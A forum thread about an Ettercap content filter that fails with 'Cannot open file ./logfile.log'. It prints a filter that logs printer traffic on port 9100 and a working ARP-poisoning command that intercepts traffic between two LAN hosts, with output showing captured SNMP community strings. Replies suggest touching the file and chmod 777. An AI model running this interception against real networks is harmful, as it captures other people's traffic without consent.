Results 1 to 9 of 9

Thread: Ettercap Filters Error "filter engine: Cannot open file ./logfile.log"

  1. #1
    King Tutorial-ankhamun
    Join Date
    Jul 2004
    Posts
    897

    Ettercap Filters Error "filter engine: Cannot open file ./logfile.log"

    I've asked this on Ettercap's forum, but anyone who has visited there knows its mostly filled with spam ads for porn and pharmaceuticals. I've also tried to Google for "ettercap filters" but my tutorials are are the first things to come up. So, here I ask you guys.

    I'm pretty sure the filter I wrote should work, but I always get the error "filter engine: Cannot open file ./logfile.log" Below is a printout of the code and all of the error messages. Any ideas on what is wrong? It's a Debian box I'm working on. Thanks.

    Code:
    ig:~# cat printsnarf.filter
    if (ip.proto == TCP && tcp.dst == 9100) {
       log(DATA.data, "./logfile.log");
    }
    ig:~#
    
    
    ig:~# etterfilter printsnarf.filter -o ps.ef
    
    etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    
     12 protocol tables loaded:
            DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
    
     11 constants loaded:
            VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
    
     Parsing source file 'printsnarf.filter'  done.
    
     Unfolding the meta-tree  done.
    
     Converting labels to real offsets  done.
    
     Writing output to 'ps.ef'  done.
    
     -> Script encoded into 6 instructions.
    
    ig:~# ettercap -Tq -F /root/ps.ef -M arp /192.168.22.33/ /192.168.22.193/
    
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Content filters loaded from /root/ps.ef...
    Listening on eth0... (Ethernet)
    
      eth0 ->       00:E0:B8:30:4B:6C    192.168.30.130     255.255.240.0
    
    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Scanning for merged targets (2 hosts)...
    
    * |==================================================>| 100.00 %
    
    2 hosts added to the hosts list...
    
    ARP poisoning victims:
    
     GROUP 1 : 192.168.22.33 00:60:B0:6D:47:C6
    
     GROUP 2 : 192.168.22.193 00:11:43:BF:AF:57
    Starting Unified sniffing...
    
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    SNMP : 192.168.22.33:161 -> COMMUNITY: public  INFO: SNMP v1
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    SNMP : 192.168.22.193:1122 -> COMMUNITY: public  INFO: SNMP v1
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    filter engine: Cannot open file ./logfile.log
    Closing text interface...
    
    ARP poisoner deactivated.
    RE-ARPing the victims...
    Unified sniffing was stopped.
    
    ig:~#

  2. #2
    Senior Member
    Join Date
    Aug 2003
    Posts
    185
    i'm not shure what youre talking bout...
    but... what about using an absolute path like '/tmp/logfile.log' ???
    Industry Kills Music.

  3. #3
    King Tutorial-ankhamun
    Join Date
    Jul 2004
    Posts
    897
    I tried that as well.

  4. #4
    Senior Member
    Join Date
    Aug 2003
    Posts
    185
    if error only occurs using your "printsnarf.filter"
    pls let us have a look (on_it)
    Industry Kills Music.

  5. #5
    King Tutorial-ankhamun
    Join Date
    Jul 2004
    Posts
    897
    I cated out the code above, but here it is again:

    Code:
    if (ip.proto == TCP && tcp.dst == 9100) {
       log(DATA.data, "./logfile.log");
    }

  6. #6
    I don't know how helpful this is, but I've seen similar problems with files locking on apache servers. If ettercap is writing to that logfile.log is may not allow your filter to be accessing the data from that file at the same time. I don't know how that applies here though because it seem like the filter would be allowed access to that file.

    If not that, is it possible to just bypass that ./logfile.log and log your filter directly to DATA.data? (again, not familiar with all workings of ettercap)
    "Experience is the hardest teacher, it gives the test first and the lesson after." Anonymous

  7. #7
    King Tutorial-ankhamun
    Join Date
    Jul 2004
    Posts
    897
    Originally posted here by The_Captain
    If not that, is it possible to just bypass that ./logfile.log and log your filter directly to DATA.data? (again, not familiar with all workings of ettercap) [/B]
    That's not really how Ettercap works with filters, as best as I can tell from what little documentation thre is it should work as it is.

  8. #8
    Senior Member genXer's Avatar
    Join Date
    Jun 2005
    Posts
    252
    While this does not answer your question Irongeek, I found just one other site, besides your tuts that have some helpful information on ettercap:

    http://securitypronews.com/securityp...andBeyond.html

    While not an expert on this, what you have in your code should work. I will see if I can find something else and also bounce this it off a few peoples.

    Just to ask the stupid question:

    1. Do you need to "touch" the logfile.log before running Ettercap?
    \"We\'re the middle children of history.... no purpose or place. We have no Great War, no Great Depression. Our great war is a spiritual war. Our great depression is our lives. We\'ve all been raised by television to believe that one day we\'ll all be millionaires and movie gods and rock stars -- but we won\'t. And we\'re learning slowly that fact. And we\'re very, very pissed off.\" - Tyler (Brad Pitt) Fight Club.

  9. #9
    Junior Member
    Join Date
    Nov 2017
    Posts
    1

    Ettercap failures to log

    This worked for me:
    "touch" the file first, as recommended;
    chmod + 777 on the log file to make sure etterfilter can write to it.

    Good luck!

    Quote Originally Posted by genXer View Post
    While this does not answer your question Irongeek, I found just one other site, besides your tuts that have some helpful information on ettercap:

    http://securitypronews.com/securityp...andBeyond.html

    While not an expert on this, what you have in your code should work. I will see if I can find something else and also bounce this it off a few peoples.

    Just to ask the stupid question:

    1. Do you need to "touch" the logfile.log before running Ettercap?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •